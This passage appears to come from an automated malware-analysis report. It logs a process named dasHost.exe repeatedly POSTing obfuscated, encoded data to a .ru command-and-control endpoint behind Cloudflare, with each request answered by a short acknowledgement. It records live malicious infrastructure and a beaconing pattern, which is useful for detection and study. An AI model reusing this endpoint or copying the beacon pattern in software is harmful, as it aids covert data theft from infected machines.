                                                                        Dec 28, 2024 20:42:55.567270041 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:56.292149067 CET  2584  OUT  Data Raw: 53 57 5c 51 56 41 55 5c 5d 5f 52 56 5a 5a 58 5c 57 51 5f 59 54 5d 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SW\QVAU\]_RVZZX\WQ_YT]U@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[+< +7#8 2^>.;T :(*;_9*7[" 3_(,%\ ![(/
                                                                        Dec 28, 2024 20:42:56.698996067 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:56.944691896 CET  810  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLFy7hnQ3r7h5ZswfGR4W%2F1DsYmBeT5N2bLpbkoFwPcMykTotfJ7Aau0%2BHhcx3ONTU5Gf1wd2fukFCuohWQxQh9S%2BKJhT36ePh%2F%2Fchx2TddZ3camzEHqNiq6o1n%2BtucVC2uPlJUL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409535f2e8c47-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6211&min_rtt=1899&rtt_var=9336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=40115&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        10          192.168.2.4  49751        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:42:58.121887922 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:58.469822884 CET  2584  OUT  Data Raw: 53 50 59 55 56 45 50 5d 5d 5f 52 56 5a 5a 58 55 57 5a 5f 5b 54 55 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYUVEP]]_RVZZXUWZ_[TUUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_</%5(<Y 6$^;;4)=<#:0*?+,:$#33_)%\ ![(/
                                                                        Dec 28, 2024 20:42:59.420763969 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:59.557224989 CET  815  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6T%2FpRt0sV4u4mesNlU9jrCQ2m7j%2F9B0%2BQpQ4k5wJtxeWv6GuxBIOT8TE7Ho1vIcWG9cWOSWS5%2BdWidVniywdV7oHz8dY%2BjVhNcqFZ8pJ%2FzvJ9LEmbo1YnXlZ%2Byxb%2BBTBJB2zAVsB"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940963aeff435d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3646&min_rtt=2275&rtt_var=3595&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=110246&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        11          192.168.2.4  49752        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:42:59.862252951 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:00.219811916 CET  2584  OUT  Data Raw: 56 57 59 52 56 49 50 5f 5d 5f 52 56 5a 5f 58 55 57 5a 5f 59 54 5c 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VWYRVIP_]_RVZ_XUWZ_YT\UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X<Z"] "6 Y/;7 .=>.,##*Y#Y,)<5V$(<%\ ![(
                                                                        Dec 28, 2024 20:43:01.006167889 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:01.244499922 CET  804  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtFHkn4sWUoW83VbycqWPRN6A9wiQpieRcNld4H3nJ7zjkWT2JMIYZcd3DPvnXPW8fMY6z2duPfDNB8BYT2SwKKu%2Fq85ND0tMqJUchLCTa5HDyX9F5T1uOZbIe7hh%2F%2FX3mFdlgSS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94096e484a4233-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4440&min_rtt=1721&rtt_var=6084&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62193&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        12          192.168.2.4  49753        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:43:01.559376955 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:01.907310963 CET  2584  OUT  Data Raw: 53 50 59 51 56 49 50 52 5d 5f 52 56 5a 5e 58 5e 57 5c 5f 5b 54 5c 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYQVIPR]_RVZ^X^W\_[T\UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(,[!+75<[,+7[ -9>>;7:4*/.X"V3),%\ ![(?
                                                                        Dec 28, 2024 20:43:02.737859011 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:02.993202925 CET  808  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01muZ33fnA7k3WJLIX2UBZJAlJTyzFUib%2Bo%2B6Rl2pReEqRO0cVQt2%2FTK%2B3MB9sG5FPrlrm%2Bg3ySEaXQGBG9MtKTz1YADZM93Y3kSLwb33wZcjDg4XRgC5hU6BVGkKIAsg4CtrQNK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94097918ff80d9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3278&min_rtt=1507&rtt_var=4108&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=93112&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        13          192.168.2.4  49755        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:43:03.277700901 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:03.626080990 CET  2584  OUT  Data Raw: 53 56 59 5f 56 49 55 5e 5d 5f 52 56 5a 5f 58 54 57 5f 5f 59 54 50 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVY_VIU^]_RVZ_XTW__YTPUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y)<&"+"%^;$#X2+= )>3[-93X50((<%\ ![(
                                                                        Dec 28, 2024 20:43:04.361829042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:04.608669996 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FIP%2B3miw%2BEX3Es6LepBifQfAo8s5FzX36wZe2Z8QpAUd9A0DW1kOrjXNmvMgIo6AqcRTzhIHid%2BAdv4S%2Fz8yWCMDP9ar44wDa%2BVWCyDHAs6K9MWJAdRCnRxWYU5Ym7xS33uJpUD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94098359ca80dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1706&rtt_var=5601&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=67743&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:43:05.117187977 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FIP%2B3miw%2BEX3Es6LepBifQfAo8s5FzX36wZe2Z8QpAUd9A0DW1kOrjXNmvMgIo6AqcRTzhIHid%2BAdv4S%2Fz8yWCMDP9ar44wDa%2BVWCyDHAs6K9MWJAdRCnRxWYU5Ym7xS33uJpUD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94098359ca80dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1706&rtt_var=5601&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=67743&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.4 | 49756 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:05.410176992 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:05.766735077 CET | 2580 | OUT | Data Raw: 53 50 5c 52 56 40 50 58 5d 5f 52 56 5a 58 58 54 57 5e 5f 5d 54 57 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SP\RV@PX]_RVZXXTW^_]TWUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[<<!]"; %,Z-+ #.&Y).3 )+>?$.:?\"##=<%\ ![(
                                                                        Dec 28, 2024 20:43:06.497085094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:06.741935015 CET | 805 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQC3ir3ARCvYVlr%2BRa3dRXcRuvEoNptWzXdvX1h2x7XSwBM8PpETNP0EReg3ZniKeRg%2Bw9UBot4Bn0bz0o8xspNdBtZ5xu61ntjR2%2FfMopJRQID3DndLV8p0GU5WQLsF2t5deYwB"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940990ac3ec34d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6657&min_rtt=1558&rtt_var=10782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=34474&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.4 | 49762 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:07.010354996 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:07.360524893 CET | 2584 | OUT | Data Raw: 56 53 59 53 53 46 50 53 5d 5f 52 56 5a 50 58 5a 57 5b 5f 5c 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYSSFPS]_RVZPXZW[_\TPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$(/:68' 5(/] !>2Y>$ )/Q=,,.9'!V')%\ ![(
                                                                        Dec 28, 2024 20:43:08.142354012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:08.384448051 CET | 803 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BMnILoFhEj958AUHBLK9mjjJDMLPyiaaXUWZsvwSrOcH6J3E6n1iUhfKAnVxqBhvG%2BtnU2MYzUpXBcxCVfvVFezZB7j8AD3JSd92ioFrBJkh6h4MDRReUh5ML9VV2TZ4rCDVpz76"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94099aefd041f3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9977&min_rtt=2254&rtt_var=16291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=22798&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.4 | 49766 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:08.631288052 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:08.985441923 CET | 2584 | OUT | Data Raw: 56 5b 5c 52 56 44 50 5e 5d 5f 52 56 5a 5b 58 5e 57 58 5f 5d 54 57 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\RVDP^]_RVZ[X^WX_]TWUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX')/-]!(8 6?8+4#--+>, 9'U)/'[9'63 *%\ ![(+
                                                                        Dec 28, 2024 20:43:09.716850042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:09.955317020 CET | 819 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10o82qO2e%2BvO0NAbbTDWtaFAuS%2FFQwIbSNwrL9Nu93uC7uZ%2BYMHzkfg6Rw7DX4oX%2FUhK0UEcY9aJZdl1tK4SsChd%2F%2FgoKBJLPqsBxqftY5QVitNIo4Wq%2FZ5Sha0Z%2FN2M%2FCRk%2FJQH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409a4cfc443f9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7317&min_rtt=2192&rtt_var=11072&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=33800&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.4 | 49769 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:10.198853970 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:10.548271894 CET | 2584 | OUT | Data Raw: 56 51 5c 53 56 45 55 58 5d 5f 52 56 5a 50 58 59 57 5b 5f 5f 54 50 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQ\SVEUX]_RVZPXYW[__TPUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<,)Z!88"&;-+0#=2]>=P )?^9860;*%\ ![(
                                                                        Dec 28, 2024 20:43:11.283055067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:11.534069061 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hxgXC%2BKGNcoSPaVP4YPuEOiZG8bn2O8w6TkH9WORCGUgGXosRC08ktq7DXNljPOdZS8E1kK%2FV1Y1d6YWhOqaPPdq9pbRXT9HUXDdHwxp0i0JaWUIQv3hmS67iL6eVF%2Fhi9Za1NQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ae9f590cc6-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4248&min_rtt=1550&rtt_var=5979&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=63091&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.4 | 49775 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:11.777249098 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
